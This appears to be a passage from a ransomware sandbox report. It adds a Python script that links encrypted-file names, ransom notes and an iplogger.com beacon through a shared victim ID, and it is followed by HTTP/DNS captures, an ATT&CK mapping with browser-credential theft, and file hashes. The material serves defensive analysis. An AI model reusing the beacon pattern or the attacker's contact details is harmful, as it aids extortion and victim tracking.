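Two artefacts in this report carry the same victim ID: the encrypted-file names under "Drops file in Program Files directory" (original name, then .[74B92775], then .[ardellchadwick275@msgsafe.io], then .mkp) and the Referer of the iplogger.com request above (74B92775;2.22). The following is an added example for this page, not code from the sandbox or from the sample, that parses both and ties them together: it extracts victim ID, contact address and extension from file paths, counts ransom notes, pulls the ID out of a raw HTTP request's Referer, and reports which beacon hosts share an ID with the encrypted files. The regexes, the "<8 hex>;<version>" reading of the Referer and the helper names are this example's assumptions; the sample paths and request text are copied from the report and labelled as constructed input.

```python
import re
from typing import Dict, List, Optional

# Name layout seen in the report: "<original>.[<8-hex victim id>].[<contact e-mail>].<ext>".
ENCRYPTED_NAME = re.compile(
    r"^(?P<orig>.+?)\.\[(?P<vid>[0-9A-F]{8})\]\.\[(?P<email>[^\]\s]+@[^\]\s]+)\]\.(?P<ext>[A-Za-z0-9]{2,8})$")
RANSOM_NOTE = "+README-WARNING+.txt"
# Referer seen on the beacon: "<8-hex victim id>;<dotted number>". Reading the number as a
# version string is an assumption of this example.
REFERER_BEACON = re.compile(r"^(?P<vid>[0-9A-F]{8});(?P<ver>\d+(?:\.\d+)*)$")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def parse_encrypted_name(path: str) -> Optional[Dict[str, str]]:
    """orig/vid/email/ext for a path that carries the encrypted-file suffix, else None."""
    m = ENCRYPTED_NAME.match(basename(path))
    return m.groupdict() if m else None


def parse_http_request(raw: str) -> Dict[str, str]:
    """Request line plus headers (header names lower-cased) from a raw HTTP/1.x request."""
    lines = raw.strip().splitlines()
    method, target, _version = lines[0].split(" ", 2)
    req = {"method": method, "target": target}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            req[name.strip().lower()] = value.strip()
    return req


def beacon_from_request(raw: str) -> Optional[Dict[str, str]]:
    """host/target/vid/ver when the Referer has the '<8 hex>;<number>' shape, else None."""
    req = parse_http_request(raw)
    m = REFERER_BEACON.match(req.get("referer", ""))
    if not m:
        return None
    return {"host": req.get("host", ""), "target": req["target"], **m.groupdict()}


def correlate(paths: List[str], requests: List[str]) -> Dict[str, object]:
    """Tie host artefacts to network artefacts through the victim id."""
    files = [f for f in map(parse_encrypted_name, paths) if f]
    notes = sum(1 for p in paths if basename(p) == RANSOM_NOTE)
    beacons = [b for b in map(beacon_from_request, requests) if b]
    ids = {f["vid"] for f in files}
    return {
        "victim_ids": sorted(ids),
        "contact_emails": sorted({f["email"] for f in files}),
        "extensions": sorted({f["ext"] for f in files}),
        "encrypted_files": len(files),
        "ransom_notes": notes,
        "beacon_hosts_with_matching_id": sorted({b["host"] for b in beacons if b["vid"] in ids}),
    }


# Constructed sample input, copied from the artefacts in this report.
PATHS = [
    r"C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf.[74B92775].[ardellchadwick275@msgsafe.io].mkp",
    r"C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\+README-WARNING+.txt",
    r"C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\+README-WARNING+.txt",
    r"C:\Users\Admin\AppData\Local\Temp\318E.tmp.bmp",  # the wallpaper; not an encrypted file
]
REQUESTS = [
    "GET /1QhhX4 HTTP/1.1\r\nReferer: 74B92775;2.22\r\nHost: iplogger.com\r\nCache-Control: no-cache\r\n",
    "GET /r/gsr1.crl HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\n"
    "User-Agent: Microsoft-CryptoAPI/6.1\r\nHost: c.pki.goog\r\n",  # CRL fetch, no Referer: not a beacon
]

if __name__ == "__main__":
    print(correlate(PATHS, REQUESTS))
```

On the constructed input the result names one victim ID (74B92775), one contact address, one extension (mkp), one encrypted file, two ransom notes and iplogger.com as the only beacon host whose Referer carries a matching ID; the CryptoAPI CRL request is parsed but dropped because it has no Referer. In an incident the same join across a full file listing and a proxy log is what lets you attribute the outbound hit to the encryption event rather than to unrelated browsing.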
DNS (8.8.8.8:53)
  Request:  c.pki.goog  IN A
  Response: c.pki.goog  IN CNAME  pki-goog.l.google.com
            pki-goog.l.google.com  IN A  142.250.179.227

GET http://c.pki.goog/r/gsr1.crl  (remote 142.250.179.227:80, by 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe)

Request:
GET /r/gsr1.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: c.pki.goog

Response:
HTTP/1.1 200 OK
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
Content-Length: 1739
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Tue, 25 Mar 2025 12:31:21 GMT
Expires: Tue, 25 Mar 2025 13:21:21 GMT
Cache-Control: public, max-age=3000
Last-Modified: Tue, 07 Jan 2025 07:28:00 GMT
Content-Type: application/pkix-crl
Vary: Accept-Encoding
Age: 1974

GET http://c.pki.goog/r/r4.crl  (remote 142.250.179.227:80, same connection)

Request:
GET /r/r4.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: c.pki.goog

Response:
HTTP/1.1 200 OK
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
Content-Length: 436
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Tue, 25 Mar 2025 12:19:56 GMT
Expires: Tue, 25 Mar 2025 13:09:56 GMT
Cache-Control: public, max-age=3000
Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
Content-Type: application/pkix-crl
Vary: Accept-Encoding
Age: 2659

Both CRL downloads are made with the Microsoft-CryptoAPI/6.1 User-Agent: they are Windows certificate-revocation checks triggered by validating the certificate chain of the TLS connection to iplogger.com. They are attributed to the sample because it owns the socket, but c.pki.goog is a public CA endpoint, not attacker infrastructure, and should not be turned into an indicator.
Flow summary (remote, URL, protocols, process, bytes sent, bytes received, packets out, packets in):

104.21.76.57:443     https://iplogger.com/1QhhX4   tls, http  56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe  859 B  5.2kB  10  11
  HTTP Request  GET https://iplogger.com/1QhhX4
  HTTP Response 200
142.250.179.227:80   http://c.pki.goog/r/r4.crl    http       56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe  600 B  5.0kB  8   6
  HTTP Request  GET http://c.pki.goog/r/gsr1.crl
  HTTP Response 200
  HTTP Request  GET http://c.pki.goog/r/r4.crl
  HTTP Response 200
DNS  58 B  90 B   1  1
  DNS Request   iplogger.com
  DNS Response  104.21.76.57, 172.67.188.178
DNS  56 B  107 B  1  1
  DNS Request   c.pki.goog
  DNS Response  142.250.179.227
MITRE ATT&CK Enterprise v15 (count of matching signatures in parentheses)

Defense Evasion
  Direct Volume Access (1)
  Indicator Removal (3)
    File Deletion (3)
  Modify Registry (1)
Credential Access
  Credentials from Password Stores (1)
    Credentials from Web Browsers (1)
  Unsecured Credentials (1)
    Credentials In Files (1)
Downloads

Filesize: 1KB
MD5: 29abe2cf61968275a38bcf735c875d5d
SHA1: 4386674a153df8a4a1dc81bcf976ffae29299b2f
SHA256: 463c885a5b5cf4b8447e11fddf5b2028c8adf0974f6bb3178454bf26bb3082e6
SHA512: 261193ffe16866ed90f20ef293876c619393ce7e29a75cfba87badd2f34f2bed8338728a0a0ce505b6817adab04e9e22826cdd42f7917b434c1b978f07dc5871